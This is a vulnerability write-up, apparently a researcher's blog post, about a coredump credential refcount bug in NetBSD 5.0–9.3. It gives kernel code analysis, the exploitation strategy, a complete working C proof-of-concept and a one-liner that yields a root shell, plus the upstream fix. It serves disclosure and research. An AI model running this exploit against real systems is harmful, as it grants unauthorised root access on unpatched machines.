Crash Override: NetBSD 5.0-9.3 Coredump Kernel Refcount LPE

2nd October, 2022

chris

Introduction

NetBSD 5.0 (released 2009) introduced a change to the in-kernel coredump handler that accidentally introduced a reference count bug on the crashing process' credential.

Triggering the vulnerability leads to a use-after-free that can be trivially (though slowly) exploited to achieve local privilege escalation, gaining root from an unprivileged starting point.

PoC in action — The proof-of-concept privesc exploit in action against NetBSD 9.3.

This article will discuss the simplicity of both the vulnerability and exploitation strategy, leading onto a functional proof of concept exploit.

The vulnerability affects all versions of NetBSD from 5.0 through to 9.3 and can be exploited in an architecture-independent manner. A fix was pushed to branches for NetBSD 8.x and NetBSD 9.x followed by advisory release soon afterwards.

Special thanks to Christos Zoulas of NetBSD for keeping me personally updated, authoring and pushing through the relevant advisory.

Vulnerability Overview

Coredumps are created for processes when they appear to have unexpectedly terminated. The idea is to capture as much debug information as possible to assist somebody in diagnosing what actually happened and why. These coredumps are usually written to disk in the current working directory of the process with a .core file extension.

We can see the jumping off point for invoking any registered coredump handler in the guts of the signal handling code:

    /*
     * Force the current process to exit with the specified signal, dumping core
     * if appropriate.  We bypass the normal tests for masked and caught
     * signals, allowing unrecoverable failures to terminate the process without
     * changing signal state.  Mark the accounting record with the signal
     * termination.  If dumping core, save the signal number for the debugger.
     * Calls exit and does not return.
     */
    void
    sigexit(struct lwp *l, int signo)
    {
        int exitsig, error, docore;
    ...
[1]     if ((docore = (sigprop[signo] & SA_CORE)) != 0) {
    ...
        if (docore) {
            mutex_exit(p->p_lock);
[2]         MODULE_HOOK_CALL(coredump_hook, (l, NULL), enosys(), error);

If a signal is configured to force an exit of the process then we end up in this sigexit function. Further, if the specific signal has been configured to trigger a coredump [1] then we reach a call to whatever coredump_hook has been configured [2].

There is only one coredump handler registered in the NetBSD codebase:

            MODULE_HOOK_SET(coredump_hook, coredump);

The coredump function describes itself well and is pretty simple:

    /*
     * Dump core, into a file named "progname.core" or "core" (depending on the
     * value of shortcorename), unless the process was setuid/setgid.
     */
    static int
    coredump(struct lwp *l, const char *pattern)
    {
        struct vnode        *vp;
        struct proc     *p;
        struct vmspace      *vm;
        kauth_cred_t        cred;
        struct pathbuf      *pb;
        struct vattr        vattr;
        struct coredump_iostate io;
        struct plimit       *lim;
        int         error, error1;
        char            *name, *lastslash;
    ...
        /*
         * It may well not be curproc, so grab a reference to its current
         * credentials.
         */
[3]     kauth_cred_hold(p->p_cred);
        cred = p->p_cred;
    ...
[4]     pb = pathbuf_create(name);
        if (pb == NULL) {
            error = ENOMEM;
            goto done;
        }
[5]     error = vn_open(NULL, pb, 0, O_CREAT | O_NOFOLLOW | FWRITE,
            S_IRUSR | S_IWUSR, &vp, NULL, NULL);
        if (error != 0) {
            pathbuf_destroy(pb);
[6]         goto done;
        }
    ...
[7] done:
        if (name != NULL)
            PNBUF_PUT(name);
        return error;
    }

One of the first things the function does is hold onto the crashing process' credential [3]. This takes a reference on it so that it can't go away while it's being dealt with.

Omitted from the snippet here is the logic for building up the corefile name. Once it has been built, the function goes on to create a pathbuf from it [4] and then tries to open that path for writing through vn_open at [5].

If that vn_open fails for any reason — for instance, if the crashing process doesn't have permission to create files in the current directory — then the code jumps to done [6].

At done, we expect to see the cleanup code for the failed coredump attempt [7]. The name pathname buffer is indeed put, but nothing else happens here.

Importantly, the reference taken on the credential at [3] is never released. In fact, none of the error or success paths seem to do this.

This is the vulnerability: it's a classic refcount bug that we can trigger by crashing one of our processes.

Exploitability Analysis

To understand whether this refcount bug is exploitable, we need to ensure that a wrap of the refcount won't be detected or prevented. We can find that out by looking at the kauth_cred_hold function:

    /* Increment reference count to cred. */
    void
    kauth_cred_hold(kauth_cred_t cred)
    {
        KASSERT(cred != NULL);
        KASSERT(cred != NOCRED);
        KASSERT(cred != FSCRED);
        KASSERT(cred->cr_refcnt > 0);
    
[1]     atomic_inc_uint(&cred->cr_refcnt);
    }

We see here that atomic_inc_uint is used to increment the reference count [1]. That will not detect the wrap. The KASSERTs in this function are also essentially nops for anything other than debug kernels, so we can ignore them.

Also worth noting is that cr_refcnt is a u_int. That's 32 bits wide on the platforms we probably care about, which means that wrapping the count is feasible.

Assuming we can wrap the reference count and trigger a path that decrements it afterwards, what happens? We can answer that by looking at the responsible function, kauth_cred_free:

    /* Decrease reference count to cred. If reached zero, free it. */
    void
    kauth_cred_free(kauth_cred_t cred)
    {
    
        KASSERT(cred != NULL);
        KASSERT(cred != NOCRED);
        KASSERT(cred != FSCRED);
        KASSERT(cred->cr_refcnt > 0);
        ASSERT_SLEEPABLE();
    
    #ifndef __HAVE_ATOMIC_AS_MEMBAR
        membar_release();
    #endif
[2]     if (atomic_dec_uint_nv(&cred->cr_refcnt) > 0)
            return;
    #ifndef __HAVE_ATOMIC_AS_MEMBAR
        membar_acquire();
    #endif
    
        kauth_cred_hook(cred, KAUTH_CRED_FREE, NULL, NULL);
        specificdata_fini(kauth_domain, &cred->cr_sd);
[3]     pool_cache_put(kauth_cred_cache, cred);
    }

This function decrements the refcount and, if it's still positive [2], just returns out.

If the refcount did drop to zero then a little tidying up is done before putting the credential back into the kauth_cred_cache [3].

This is an interesting point to note: kauth_cred_ts are allocated from their own dedicated pool and not the general purpose heap. This fact informs our exploit development process.

I admit to knowing next to nothing about the NetBSD kernel heaps. Even so, without knowing any of the internals, we can make an educated guess that it probably works in a last-in, first-out (LIFO) fashion as most kernel heap implementations tend to.

Exploitation Strategy

We need to think about how we might exploit this:

Trigger the vulnerability to wrap the kauth_cred_t refcount to 1.
Cause kauth_cred_free to get called somehow.
Have a privileged kauth_cred_t allocated in its place.

If we assume the kernel heap operates on a LIFO basis, this should be enough to elevate our privileges. So what could be a convenient way of calling kauth_cred_free on our credential?

One very simple observation is that kauth_cred_free is called when a process is reaped. This leads to a nice simple strategy of looping doing:

Fork.
In the child, trigger a coredump (e.g. through abort(3)).
In the parent, reap the child through wait(2).

Eventually that reap at step 3 will drop the kauth_cred_t reference from its wrapped value of 1 down to 0 and cause it to be freed, leaving the parent process with a dangling credential on its process (p->p_cred).

With a dangling kauth_cred_t pointer, our next job is to allocate a privileged credential in its place. How could we do that? Amusingly, it turns out that we can just call setuid(0); and magically become root. :)

Let's start out by looking at sys_setuid:

    /* ARGSUSED */
    int
    sys_setuid(struct lwp *l, const struct sys_setuid_args *uap, register_t *retval)
    {
        /* {
            syscallarg(uid_t) uid;
        } */
        uid_t uid = SCARG(uap, uid);
    
[1]     return do_setresuid(l, uid, uid, uid,
                    ID_R_EQ_R | ID_E_EQ_R | ID_S_EQ_R);
    }

Most of the core logic of the various setuid functions is actually implemented by the do_setresuid function [1].

    /*
     * Set real, effective and saved uids to the requested values.
     * non-root callers can only ever change uids to values that match
     * one of the processes current uid values.
     * This is further restricted by the flags argument.
     */
    
    int
    do_setresuid(struct lwp *l, uid_t r, uid_t e, uid_t sv, u_int flags)
    {
        struct proc *p = l->l_proc;
        kauth_cred_t cred, ncred;
    
[2]     ncred = kauth_cred_alloc();
    
        /* Get a write lock on the process credential. */
        proc_crmod_enter();
[3]     cred = p->p_cred;
    
        /*
         * Check that the new value is one of the allowed existing values,
         * or that we have root privilege.
         */
        if ((r != -1
            && !((flags & ID_R_EQ_R) && r == kauth_cred_getuid(cred))
            && !((flags & ID_R_EQ_E) && r == kauth_cred_geteuid(cred))
            && !((flags & ID_R_EQ_S) && r == kauth_cred_getsvuid(cred))) ||
            (e != -1
            && !((flags & ID_E_EQ_R) && e == kauth_cred_getuid(cred))
            && !((flags & ID_E_EQ_E) && e == kauth_cred_geteuid(cred))
            && !((flags & ID_E_EQ_S) && e == kauth_cred_getsvuid(cred))) ||
            (sv != -1
            && !((flags & ID_S_EQ_R) && sv == kauth_cred_getuid(cred))
            && !((flags & ID_S_EQ_E) && sv == kauth_cred_geteuid(cred))
            && !((flags & ID_S_EQ_S) && sv == kauth_cred_getsvuid(cred)))) {
            int error;
    
            error = kauth_authorize_process(cred, KAUTH_PROCESS_SETID,
                p, NULL, NULL, NULL);
            if (error != 0) {
                proc_crmod_leave(cred, ncred, false);
                return error;
            }
        }
    
        /* If nothing has changed, short circuit the request */
[4]     if ((r == -1 || r == kauth_cred_getuid(cred))
            && (e == -1 || e == kauth_cred_geteuid(cred))
            && (sv == -1 || sv == kauth_cred_getsvuid(cred))) {
[5]         proc_crmod_leave(cred, ncred, false);
            return 0;
        }
    ...

The very first thing that happens in this function is a new credential, ncred, is allocated [2]. We also pull out the pointer to the current credential, cred [3].

Given that the kernel heap is LIFO and p->p_cred is dangling, we actually end up in the situation where ncred == cred. So p->p_cred is now pointing to whatever kauth_cred_alloc returned:

    /* Allocate new, empty kauth credentials. */
    kauth_cred_t
    kauth_cred_alloc(void)
    {
        kauth_cred_t cred;
    
        cred = pool_cache_get(kauth_cred_cache, PR_WAITOK);
    
        cred->cr_refcnt = 1;
        cred->cr_uid = 0;
        cred->cr_euid = 0;
        cred->cr_svuid = 0;
        cred->cr_gid = 0;
        cred->cr_egid = 0;
        cred->cr_svgid = 0;
        cred->cr_ngroups = 0;
    
        specificdata_init(kauth_domain, &cred->cr_sd);
        kauth_cred_hook(cred, KAUTH_CRED_INIT, NULL, NULL);
    
        return (cred);
    }

Aha, that just happens to be a nice pure root cred. :)

With both ncred and cred pointing to a pure root cred, we skip over the first big if-statement in do_setresuid and land at [4]. The conditions at [4] now check out and we call proc_crmod_leave before returning success to userland.

We are now magically root.

An important side note here is that our p->p_cred is actually still dangling: that's because the call to proc_crmod_leave drops a reference on one of the cred arguments. Since the cred has a refcount of 1 at this point, a free will occur.

But that's okay as long as we're careful: figuring out how to secure our access and leave the system in a stable state from this point is academic. For our proof of concept, just doing this will be fine.

The final process is:

Loop while setuid(0) fails:
1. Fork.
2. In the child, call abort(3) to trigger a coredump.
3. In the parent, call wait(2) to reap the child.
If we've exited the loop, we're now root, so drop to a shell.

Visualisation

Some ASCII art can help visualise this process. After many coredumps, we end up with our kauth_cred_t's cr_refcnt being zero:


┌────────────────────┐                                              
│                    │                                              
│                    │                                              
│    parent proc     │─p_cred─┐                                     
│                    │        │                                     
│                    │        │         ┌──────────────────────────┐
└────────────────────┘        │         │                          │
           │                  │         │       kauth_cred_t       │
           │                  │         │        uid: 1000         │
           │                  ├────────▶│       cr_refcnt: 0       │
           ▼                  │         │                          │
┌────────────────────┐        │         │                          │
│                    │        │         └──────────────────────────┘
│                    │ p_cred │                                     
│     child proc     │────────┘                                     
│                    │                                              
│                    │                                              
└────────────────────┘

Now when this child triggers a coredump, we end up with yet another reference taken:


┌────────────────────┐                                              
│                    │                                              
│                    │                                              
│    parent proc     │─p_cred─┐                                     
│                    │        │                                     
│                    │        │         ┌──────────────────────────┐
└────────────────────┘        │         │                          │
           │                  │         │       kauth_cred_t       │
           │                  │         │        uid: 1000         │
           │                  ├────────▶│       cr_refcnt: 1       │
           ▼                  │         │                          │
┌────────────────────┐        │         │                          │
│                    │        │         └──────────────────────────┘
│     child proc     │ p_cred │                                     
│   <in coredump>    │────────┘                                     
│                    │                                              
│                    │                                              
└────────────────────┘

Since coredump bumps the refcount to 1 and leaves it there, when the parent process now comes to reap the child, kauth_cred_free will see cr_refcnt drop to zero and free the cred:


                                     ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 
┌────────────────────┐                                          │
│                    │               │      <free memory>        
│                    │                       kauth_cred_t       │
│    parent proc     │────p_cred────▶│        uid: 1000          
│                    │                       cr_refcnt: 0       │
│                    │               │                           
└────────────────────┘                ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘

Now our process' p_cred points to something that still looks like a cred, but it's actually been freed.

Calling setuid(0); now will allocate that same virtual address, overwrite it, find that we already appear to be root and return success (freeing the cred back again). That leaves us in this state:


                                     ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 
┌────────────────────┐                                          │
│                    │               │      <free memory>        
│                    │                       kauth_cred_t       │
│    parent proc     │────p_cred────▶│          uid: 0           
│                    │                       cr_refcnt: 0       │
│                    │               │                           
└────────────────────┘                ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘

Our p_cred is still pointing to freed memory, but now it looks like a root cred because of how do_setresuid works. We're effectively root, even if we are standing on thin ice at this point.

Proof of Concept Exploit

Here's the code with utility code omitted:

/*
 * Crash Override: NetBSD 5.0-9.3 Coredump LPE PoC
 * By [email protected] / 2022-Sep-06
 */
#include <machine/limits.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

#include "libpoc.h"

const char *poc_title = "NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)";
const char *poc_author = "[email protected]";

int
main(int argc, char *argv[])
{
    unsigned int n;
    char * const av[] = { "/bin/sh", "-i", NULL };
    char * const ev[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };

    banner();

    log_info("Changing directory to /");
    expect(chdir("/"));

    log_info("Beginning refcount wrap");
    for (n = 0; n < UINT_MAX; ++n) {
        if (!(n & 0x000fffff)) {
            log_progress("Progress: 0x%08x / ~0x%08x...", n, UINT_MAX);
        }

        if (!vfork()) {
            abort();
        } else {
            expect(wait(NULL));
        }

        if (!setuid(0)) {
            break;
        }
    }

    log_progress_complete();

    if (getuid() == 0) {
        log_info("Success!");
        expect(execve(av[0], av, ev));
    }

    log_fatal("Failed");
    return 0;
}

A full PoC archive is provided at the end of the article.

We can also make this a terrible one-liner for which I can only apologise:

/* cc -o d d.c && ./d */
main(){while((vfork()||*(int*)0)&&(!wait(0)||setuid(0)));execl("/bin/sh","-i",0);}

Triggering this particular refcount bug takes some time since we're continuously creating and destroying processes as we go. This was compounded by the fact that my experiments were being done on an emulated amd64 QEMU VM; all of my machines are Apple Silicon these days. vfork helps substantially over fork, but it's still a multi-hour marathon to complete the wrap.

To simplify exploit development, I decided to cheat. I modified the kernel coredump function locally to wrap after p->p_cred->cr_refcnt exceeded 200, then recompiled overnight. This gave me confidence that the bug was real without being too expensive time-wise.

Once the technique was proven, I repeated against unmodified, clean installs for both NetBSD 9.3 and NetBSD 8.0 as those represented the span of currently-maintained releases at time of writing. The exploit succeeded just fine for both.

Here's some sample output of the PoC running:

$ uname -msr
NetBSD 9.3 amd64
$ make all && ./crash-override
cc  -c -o crash-override.o crash-override.c
cc  -c -o libpoc.o libpoc.c
cc  -o crash-override crash-override.o libpoc.o
[+] NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)
[+] By [email protected]
[+] ---
[+] Changing directory to /
[+] Beginning refcount wrap
[+] Progress: 0xfff00000 / ~0xffffffff...
[+] Success!
# id
uid=0(root) gid=0(wheel)
# whoami
root
#

Fix

I reported the issue to the NetBSD Security Alert Team on the 6th of September, 2022. The issue was quickly fixed with the following patch:

diff --git a/sys/kern/kern_core.c b/sys/kern/kern_core.c
index c42bcfb229ea..22f47c894ae8 100644
--- a/sys/kern/kern_core.c
+++ b/sys/kern/kern_core.c
@@ -1,4 +1,4 @@
-/*	$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $	*/
+/*	$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $	*/
 
 /*
  * Copyright (c) 1982, 1986, 1989, 1991, 1993
@@ -37,7 +37,7 @@
  */
 
 #include <sys/cdefs.h>
-__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $");
+__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $");
 
 #ifdef _KERNEL_OPT
 #include "opt_execfmt.h"
@@ -121,7 +121,7 @@ coredump(struct lwp *l, const char *pattern)
 	struct vnode		*vp;
 	struct proc		*p;
 	struct vmspace		*vm;
-	kauth_cred_t		cred;
+	kauth_cred_t		cred = NULL;
 	struct pathbuf		*pb;
 	struct vattr		vattr;
 	struct coredump_iostate	io;
@@ -145,9 +145,7 @@ coredump(struct lwp *l, const char *pattern)
 	if (USPACE + ctob(vm->vm_dsize + vm->vm_ssize) >=
 	    p->p_rlimit[RLIMIT_CORE].rlim_cur) {
 		error = EFBIG;		/* better error code? */
-		mutex_exit(p->p_lock);
-		mutex_exit(&proc_lock);
-		goto done;
+		goto release;
 	}
 
 	/*
@@ -164,9 +162,7 @@ coredump(struct lwp *l, const char *pattern)
 	if (p->p_flag & PK_SUGID) {
 		if (!security_setidcore_dump) {
 			error = EPERM;
-			mutex_exit(p->p_lock);
-			mutex_exit(&proc_lock);
-			goto done;
+			goto release;
 		}
 		pattern = security_setidcore_path;
 	}
@@ -180,11 +176,8 @@ coredump(struct lwp *l, const char *pattern)
 	error = coredump_buildname(p, name, pattern, MAXPATHLEN);
 	mutex_exit(&lim->pl_lock);
 
-	if (error) {
-		mutex_exit(p->p_lock);
-		mutex_exit(&proc_lock);
-		goto done;
-	}
+	if (error)
+		goto release;
 
 	/*
 	 * On a simple filename, see if the filesystem allow us to write
@@ -198,6 +191,7 @@ coredump(struct lwp *l, const char *pattern)
 			error = EPERM;
 	}
 
+release:
 	mutex_exit(p->p_lock);
 	mutex_exit(&proc_lock);
 	if (error)
@@ -284,6 +278,8 @@ coredump(struct lwp *l, const char *pattern)
 	if (error == 0)
 		error = error1;
 done:
+	if (cred != NULL)
+		kauth_cred_free(cred);
 	if (name != NULL)
 		PNBUF_PUT(name);
 	return error;

We can see that the fix correctly adds the missing kauth_cred_free call to the exit path.

The patch was made for NetBSD 8.x and 9.x; releases prior to NetBSD 8.0 are not maintained per the NetBSD maintenance policy and so won't receive the fix.

PoC Archive

Download here.